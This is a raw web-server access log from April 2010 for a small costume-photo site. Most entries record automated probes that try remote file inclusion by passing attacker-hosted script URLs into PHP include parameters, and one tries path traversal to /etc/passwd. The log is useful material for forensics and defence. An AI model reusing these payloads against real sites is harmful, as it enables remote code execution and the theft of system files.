90.182.6.34 - - [16/Apr/2010:11:48:10 -0500] "GET /costume/costume68%20copy.JPG HTTP/1.1" 200 17278 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
90.182.6.34 - - [16/Apr/2010:11:48:10 -0500] "GET /costume/costume69%20copy.JPG HTTP/1.1" 200 16551 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
90.182.6.34 - - [16/Apr/2010:11:48:10 -0500] "GET /costume/costume71%20copy.JPG HTTP/1.1" 200 15824 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
90.182.6.34 - - [16/Apr/2010:11:48:10 -0500] "GET /costume/costume72%20copy.JPG HTTP/1.1" 200 17645 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
90.182.6.34 - - [16/Apr/2010:11:48:11 -0500] "GET /costume/costume70.JPG HTTP/1.1" 200 60587 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
90.182.6.34 - - [16/Apr/2010:11:48:11 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
90.182.6.34 - - [16/Apr/2010:11:48:14 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
89.111.177.26 - - [16/Apr/2010:11:52:18 -0500] "GET /logs/access_log.1212969600%20%20//?path%5Bdocroot%5D=http://stul.netsolutions.cz/img/.emergency/x.pl??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
89.111.177.26 - - [16/Apr/2010:11:52:36 -0500] "GET /logs/access_log.1214784000%20%20//?path%5Bdocroot%5D=http://stul.netsolutions.cz/img/.emergency/x.pl??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
221.139.0.75 - - [16/Apr/2010:11:58:44 -0500] "GET /logs/access_log.1267920000/index.php?sayfa=http://www.hackclub.com.ar/javascript//id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
221.139.0.75 - - [16/Apr/2010:11:58:44 -0500] "GET /index.php?sayfa=http://www.hackclub.com.ar/javascript//id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
221.139.0.75 - - [16/Apr/2010:11:58:44 -0500] "GET /logs/index.php?sayfa=http://www.hackclub.com.ar/javascript//id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.111.177.26 - - [16/Apr/2010:12:00:33 -0500] "GET /logs/access_log.1219708800//?path%5Bdocroot%5D=http://stul.netsolutions.cz/img/.emergency/x.pl??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
207.46.195.225 - - [16/Apr/2010:12:00:49 -0500] "GET /logs/access_log.1185926400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.185.231.103 - - [16/Apr/2010:12:05:31 -0500] "GET /solpot.html?body=http://nila1.fileave.com/fz1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
89.185.231.103 - - [16/Apr/2010:12:05:32 -0500] "GET /logs/access_log.1262476800/solpot.html?body=http://nila1.fileave.com/fz1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
89.185.231.103 - - [16/Apr/2010:12:05:33 -0500] "GET /logs/solpot.html?body=http://nila1.fileave.com/fz1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:05:58 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:05:58 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:05:58 -0500] "GET /logs/access_log.1219536000//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:06:06 -0500] "GET /logs/access_log.1217635200//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:06:50 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:06:50 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:06:55 -0500] "GET /logs/access_log.1217635200//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:06:57 -0500] "GET /logs/access_log.1219536000//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
89.185.231.103 - - [16/Apr/2010:12:07:03 -0500] "GET /logs/access_log.1259020800/solpot.html?body=http://nila1.fileave.com/fz1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
89.185.231.103 - - [16/Apr/2010:12:07:11 -0500] "GET /solpot.html?body=http://nila1.fileave.com/fz1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
89.185.231.103 - - [16/Apr/2010:12:07:11 -0500] "GET /logs/solpot.html?body=http://nila1.fileave.com/fz1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
89.185.231.103 - - [16/Apr/2010:12:07:11 -0500] "GET /logs/access_log.1262476800/solpot.html?body=http://nila1.fileave.com/fz1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:07:14 -0500] "GET /logs/access_log.1219536000//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:07:14 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:07:15 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:07:15 -0500] "GET /logs/access_log.1217635200//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:07:50 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:07:50 -0500] "GET /logs/access_log.1219536000//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:07:51 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:07:52 -0500] "GET /logs/access_log.1217635200//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
89.185.231.103 - - [16/Apr/2010:12:08:22 -0500] "GET /logs/access_log.1259020800/solpot.html?body=http://nila1.fileave.com/fz1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.46.195.229 - - [16/Apr/2010:12:10:47 -0500] "GET /logs/access_log.1244246400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
194.168.31.50 - - [16/Apr/2010:12:16:40 -0500] "GET /com_joomla-visites/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
194.168.31.50 - - [16/Apr/2010:12:16:40 -0500] "GET /logs/com_joomla-visites/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
194.168.31.50 - - [16/Apr/2010:12:16:40 -0500] "GET /logs/access_log.1220054400%20%20/com_joomla-visites/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
72.30.161.241 - - [16/Apr/2010:12:16:54 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.241 - - [16/Apr/2010:12:16:54 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.168.31.50 - - [16/Apr/2010:12:18:39 -0500] "GET /com_joomla-visites/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
194.168.31.50 - - [16/Apr/2010:12:18:39 -0500] "GET /logs/com_joomla-visites/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
194.168.31.50 - - [16/Apr/2010:12:18:39 -0500] "GET /logs/access_log.1220054400/com_joomla-visites/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
194.168.31.50 - - [16/Apr/2010:12:20:32 -0500] "GET /logs/access_log.1220054400%20%20/com_joomla-visites/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
194.168.31.50 - - [16/Apr/2010:12:20:32 -0500] "GET /logs/com_joomla-visites/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
194.168.31.50 - - [16/Apr/2010:12:20:32 -0500] "GET /com_joomla-visites/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
137.101.192.15 - - [16/Apr/2010:12:21:11 -0500] "GET /logs/access_log.1262476800//appserv/main.php?appserv_root=http://www.scrappybitznbobz.com.au/admin/idxx.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:12:28:30 -0500] "GET /logs/admin/config_settings.tpl.php?include_path=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:12:28:30 -0500] "GET /admin/config_settings.tpl.php?include_path=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:12:28:40 -0500] "GET /admin/config_settings.tpl.php?include_path=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:12:28:40 -0500] "GET /logs/admin/config_settings.tpl.php?include_path=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:12:28:40 -0500] "GET /logs/access_log.1262822400/admin/config_settings.tpl.php?include_path=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.149.228.44 - - [16/Apr/2010:12:29:02 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.149.228.44 - - [16/Apr/2010:12:29:02 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.149.228.44 - - [16/Apr/2010:12:29:02 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.149.228.44 - - [16/Apr/2010:12:29:02 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.96.156.84 - - [16/Apr/2010:12:29:55 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.96.156.84 - - [16/Apr/2010:12:29:55 -0500] "GET /logs/access_log.1219708800%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
222.96.156.84 - - [16/Apr/2010:12:29:55 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:12:30:28 -0500] "GET /logs/access_log.1262822400/admin/config_settings.tpl.php?include_path=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:12:30:28 -0500] "GET /logs/access_log.1265760000/admin/config_settings.tpl.php?include_path=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
194.168.31.50 - - [16/Apr/2010:12:30:31 -0500] "GET /logs/com_joomla-visites/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
194.168.31.50 - - [16/Apr/2010:12:30:31 -0500] "GET /logs/access_log.1220054400/com_joomla-visites/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
194.168.31.50 - - [16/Apr/2010:12:30:31 -0500] "GET /com_joomla-visites/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.96.156.84 - - [16/Apr/2010:12:30:44 -0500] "GET /logs/access_log.1212969600%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:12:31:40 -0500] "GET /index1.php?site=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:12:31:40 -0500] "GET /logs/index1.php?site=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:12:31:40 -0500] "GET /logs/access_log.1263859200/index1.php?site=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:31:52 -0500] "GET /logs/access_log.1219536000//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:31:52 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:31:52 -0500] "GET /logs/access_log.1217635200//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:31:58 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:12:32:00 -0500] "GET /logs/access_log.1262736000/index1.php?site=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:32:14 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:32:14 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:32:16 -0500] "GET /logs/access_log.1217635200//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:12:32:17 -0500] "GET /logs/access_log.1219536000//admin/classes/TplLoad.php?full_path_to_public_program=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:12:32:59 -0500] "GET /logs/index1.php?site=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:12:32:59 -0500] "GET /index1.php?site=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:12:32:59 -0500] "GET /logs/access_log.1263859200/index1.php?site=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:12:33:07 -0500] "GET /index1.php?site=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:12:33:07 -0500] "GET /logs/access_log.1263859200/index1.php?site=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:12:33:07 -0500] "GET /logs/index1.php?site=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:12:33:19 -0500] "GET /logs/access_log.1262736000/index1.php?site=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:12:33:23 -0500] "GET /logs/access_log.1262736000/index1.php?site=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.46.157.102 - - [16/Apr/2010:12:34:00 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
72.46.157.102 - - [16/Apr/2010:12:34:00 -0500] "GET /logs/access_log.1268956800//bbs//skin/ggambo7002_board/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
72.46.157.102 - - [16/Apr/2010:12:34:00 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:12:34:06 -0500] "GET /include/common.php?include_path=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:12:34:06 -0500] "GET /logs/include/common.php?include_path=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:12:34:06 -0500] "GET /logs/access_log.1262822400/include/common.php?include_path=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
67.195.112.180 - - [16/Apr/2010:12:35:55 -0500] "GET /logs/access_log.1190073600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [16/Apr/2010:12:36:01 -0500] "GET /logs/access_log.1214784000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [16/Apr/2010:12:40:16 -0500] "GET /costume/thmb1.htm HTTP/1.0" 200 3957 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.9.14.88 - - [16/Apr/2010:12:41:58 -0500] "GET /logs/send_reminders.php?includedir=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
195.9.14.88 - - [16/Apr/2010:12:41:58 -0500] "GET /send_reminders.php?includedir=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
195.9.14.88 - - [16/Apr/2010:12:41:58 -0500] "GET /logs/access_log.1212969600/send_reminders.php?includedir=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
62.149.228.44 - - [16/Apr/2010:12:42:45 -0500] "GET /logs/access_log.1219708800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.149.228.44 - - [16/Apr/2010:12:43:15 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
195.9.14.88 - - [16/Apr/2010:12:49:17 -0500] "GET /logs/access_log.1212969600%20%20/send_reminders.php?includedir=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
212.241.177.123 - - [16/Apr/2010:12:50:17 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
212.241.177.123 - - [16/Apr/2010:12:50:17 -0500] "GET /logs/access_log.1267920000//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
212.241.177.123 - - [16/Apr/2010:12:50:17 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 200 1953 "-""Mozilla/5.0"
207.46.13.131 - - [16/Apr/2010:12:50:48 -0500] "GET /logs/access_log.1198368000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.218.116.132 - - [16/Apr/2010:12:51:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.208.34.38 - - [16/Apr/2010:12:56:24 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://stul.netsolutions.cz/img/.emergency/id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.208.34.38 - - [16/Apr/2010:12:56:24 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://stul.netsolutions.cz/img/.emergency/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.208.34.38 - - [16/Apr/2010:12:56:24 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://stul.netsolutions.cz/img/.emergency/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.208.34.38 - - [16/Apr/2010:12:56:28 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://stul.netsolutions.cz/img/.emergency/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:13:04:35 -0500] "GET /forum/index.php?includeFooter=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:13:04:35 -0500] "GET /logs/forum/index.php?includeFooter=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:13:04:35 -0500] "GET /logs/access_log.1262822400/forum/index.php?includeFooter=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:13:04:50 -0500] "GET /logs/access_log.1262822400/forum/index.php?includeFooter=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:13:04:50 -0500] "GET /forum/index.php?includeFooter=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.70.32.2 - - [16/Apr/2010:13:04:50 -0500] "GET /logs/forum/index.php?includeFooter=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:05:20 -0500] "GET //delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:05:23 -0500] "GET /logs//delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:05:23 -0500] "GET /logs/access_log.1270684800%20%20//delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:05:36 -0500] "GET /logs//delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:05:37 -0500] "GET //delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
124.49.100.254 - - [16/Apr/2010:13:05:38 -0500] "GET /logs/access_log.1270684800%20%20//delete_all.php?board.skin.path=http://jnkhosting.co.uk/f1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
195.9.14.88 - - [16/Apr/2010:13:06:24 -0500] "GET /logs/access_log.1198972800/send_reminders.php?includedir=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
85.114.135.218 - - [16/Apr/2010:13:06:27 -0500] "GET /logs/access_log.1219363200/news.php?DOCUMENT_ROOT=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 319 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
221.139.0.75 - - [16/Apr/2010:13:07:50 -0500] "GET /logs/access_log.1220054400%20%20//Gallery/displayCategory.php?basepath=http://www.hackclub.com.ar/javascript//id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
221.139.0.75 - - [16/Apr/2010:13:07:54 -0500] "GET //Gallery/displayCategory.php?basepath=http://www.hackclub.com.ar/javascript//id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
221.139.0.75 - - [16/Apr/2010:13:07:54 -0500] "GET /logs//Gallery/displayCategory.php?basepath=http://www.hackclub.com.ar/javascript//id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
